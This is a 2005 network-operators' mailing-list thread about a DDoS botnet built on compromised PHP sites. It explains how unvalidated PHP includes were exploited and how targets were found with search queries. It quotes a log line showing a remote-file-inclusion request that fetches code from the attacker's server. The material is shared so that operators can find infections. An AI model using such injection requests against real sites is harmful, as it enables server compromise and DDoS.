Re:Destructive botnet originating from Japan
Here is a little update: As of last night authorities were able to seize the IRC server from the ISP in Japan and there will be extensive follow-up it. The DDoS attack is now running headless in the happy range of about 3+ Gbps at around 7-9M PPS. The bots will continue attacking us until they receive the stop command from the bot master, there will never be a stop command, so we will continue to see packet love for a few months while people find that they are attacking us. We will publish a new list of the bots on Monday as we idle with this low traffic rate over the weekend. The attacker was targeting a couple customers that came into our environment after other solutions failed to work for them. After reviewing and comparing notes, it is obvious that the attacks were assassination attempts from a competitor. There was no extortion involved. If you want to get the bots off your network, watch flow data destined to AS32787 with SYN floods to TCP 80 as the destination. Sites that use a PHP include (without validating the strings) to pull- up different web sections and pages are at risk, a lot of people are reporting infection via "$section.php" and "$page.php", the attacker appears to have used Google to locate sites that use includes in that fashion (searching "index.php?page=" or "index.php?section="). Reviewing infected machines for logs related to 210.170.60.2 would be easy to locate a past infection but may not be reliable if the attacker starts a new botnet. An example of the log data looks something like this: grep 210.170.60.2 access_log 210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php? section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6" Happy hunting and have nice holidays! -Barrett -- Barrett Lyon CTO and founder Prolexic Technologies, Inc
Hi, NANOGers. We've seen these PHP-built botnets for about two years now. They have recently become more popular. This is due to the fact that a very few of these bots can send out far more packet love than a large collection of broadband (generally Windows) bots. Return on investment and all that. Most bots don't attack "forever." The typical bot commands give an attack duration in either packets or time. I suspect that'll be the case with this botnet, so the attack may not last for months. In other words, it would be wise to check those flows sooner rather than later. Folks shouldn't focus solely on PHP, though that is the rage du jour. Even the venerable PhatBot family, generally used to compromise hosts running Windows, had a Linux spreader in it. Increasingly Unix systems and Cisco routers are the primary targets. Keep in mind that botnets are but one facet of the threat. There are a plethora of just-in-time DoSnets built off of the same vulnerabilities. In this case there is no central command and control making mitigation even more challenging. It's fairly easy to run a command on a vulnerable host through the same exploit that will permit one to install a bot. Just-in-time DoSnets are readily built and used in amplification attacks as well. Bots have never been solely a Windows problem. Thanks, Rob. -- Rob Thomas Team Cymru http://www.cymru.com/ ASSERT(coffee != empty);
On Sat, 24 Dec 2005, Rob Thomas wrote:
Hi, NANOGers.
We've seen these PHP-built botnets for about two years now. They have recently become more popular. This is due to the fact that a very few of these bots can send out far more packet love than a large collection of broadband (generally Windows) bots. Return on investment and all that.
And that due to traditions and fascination with killing C&C's rathr than facing the problem itself the Bad Guys keep having to learn and evolve. And indeed, wonder of wonders, we see for years now the /technological/ AND /opertional/ capabilities of the offenders, both kiddies and organized crime (being the main two players, evolving in their capabilities... from the malware development to employing real operatives in meat-space). ROI is indeed the deal here, as you said. I always am happy about your presence and understanding of these issues.. even if I often find the language problem to be a special difficulty for communication between us. There are not millions of dollars involved, but rather billions. Phishing alone shows us aprox half a billion dollars lost through only the first half of 2005. PHP botnets have been around for a long time, as were web-knockers before them. Like IRC they are still around, and like IRC they are used both for contol and propagation. As long as we remain short-sighted, NSP-SEC style, we will continue to fight fires rather than preventing them and fighting the actual problems. There is NO BETTER OR GREATER force for the betterment of the Internet than NSP-SEC, but it is my belief that currently it does more harm than good, in the long run. I take it back, it is not my belief - I know so. It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here.
Most bots don't attack "forever." The typical bot commands give an attack duration in either packets or time. I suspect that'll be the case with this botnet, so the attack may not last for months. In other words, it would be wise to check those flows sooner rather than later.
Word for word. I am happy there are at least a few people out there who really understand, like yourself.
Folks shouldn't focus solely on PHP, though that is the rage du jour. Even the venerable PhatBot family, generally used to compromise hosts running Windows, had a Linux spreader in it. Increasingly Unix systems and Cisco routers are the primary targets.
Bots in this meaning originated on *nix machines and there are quite a few groups out there that emloy them still quite regularly. Networking folks here should not forget this is not just a networking problems and that there are many people working on this in the anti spam, anti virus, anti whatever industries as well as in academic life and Government.
Keep in mind that botnets are but one facet of the threat. There are > a plethora of just-in-time DoSnets built off of the same vulnerabilities. In this case there is no central command and control making mitigation even more challenging. It's fairly easy to run a command on a vulnerable host through the same exploit that will permit one to install a bot. Just-in-time DoSnets are readily built and used in amplification attacks as well.
DoS is fine, but as critical as it is, it is indeed the short-sighted concern. Milions of bots... following financial transactions on every one and corelating information, impacting world economy and... I don't need to go on, you know of some of these things far better than me.
Bots have never been solely a Windows problem.
And they have never been the real problem. They are but a sympthom of the real problem. Online cooperation, liability and vulnerability are... and the Bad Guys being "funded" by millions and billions in R&D from ROI doesn't help much. It's time to move to the next stage.
Thanks, Rob. -- Rob Thomas Team Cymru http://www.cymru.com/ ASSERT(coffee != empty);
Gadi.
On Sun, Dec 25, 2005 at 02:06:38AM -0600, Gadi Evron wrote:
It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here.
Could have told you that a long time ago. NSP-SEC became useless the day it became so bogged down in its own self-aggrandizing paranoia that no one could possibly be bothered to actually tell anyone outside of the secret handshake club about security issues they've spotted. On the other hand, if you ARE going to sit around pissing and moaning about botnets you are too "sekure" to tell anyone else about, thus assuring they never get fixed, at least it's nice to do it in one secret place so I don't have to hear it. :) -- Richard A Steenbergen <ras@e-gerbil.net> http://www.e-gerbil.net/ras GPG Key ID: 0xF8B12CBC (7535 7F59 8204 ED1F CC1C 53AF 4C41 5ECA F8B1 2CBC)
On Sun, 25 Dec 2005, Richard A Steenbergen wrote:
On Sun, Dec 25, 2005 at 02:06:38AM -0600, Gadi Evron wrote:
It is difficult to hear something important that one invested much in is doing harm, but that is the only conclusion I and others can come up with after years of study, and NSP-SEC, as amazing as it has been, has been of a negative impact other than to cause a community to form and act together. Which is amazing by itself and which is why I believe it can do so much more.. even if it is relatively young it has proven itself time and time again... I am straying from the subject here.
Could have told you that a long time ago. NSP-SEC became useless the day it became so bogged down in its own self-aggrandizing paranoia that no one could possibly be bothered to actually tell anyone outside of the secret handshake club about security issues they've spotted.
On the other hand, if you ARE going to sit around pissing and moaning about botnets you are too "sekure" to tell anyone else about, thus assuring they never get fixed, at least it's nice to do it in one secret place so I don't have to hear it. :)
There is a lot to be said of NSP-SEC which is positive, not much which is negative. I am not sure where we would be today if not for NSP-SEC. Further, I believe that: 1. In today's world secret-handshake clubs for all-white all-rich all-christians are neccesary for our security. 2. Much of what is being kept secret is silly, for the Bad Guys have that information and the Good Guys fight day and night to try and grab a bit of it. In my opinion working with other communities and industries, as long as security can be maintained in a vetted enviroment is critical. That said, it has always been my goal to make public as much data as *possible*. As to NSP-SEC, it is off-topic for this list to discuss NSP-SEC policies and people here should be thankful it is there. NSP-SEC officials can reply if they like, but I doubt they will bother as they as well as the rest of us know what they are worth. As to their arrogance... I believe it is ignorance (!- stupidity) of the harm they cause and I will probably get flamed for saying this as I really hold them in an extremely high regard.. but that is how I and everyone else who has worked on botnets beyond network opeations that I know personally and discussed this with will call it. Gadi
participants (4)
-
Barrett G. Lyon
-
Gadi Evron
-
Richard A Steenbergen
-
Rob Thomas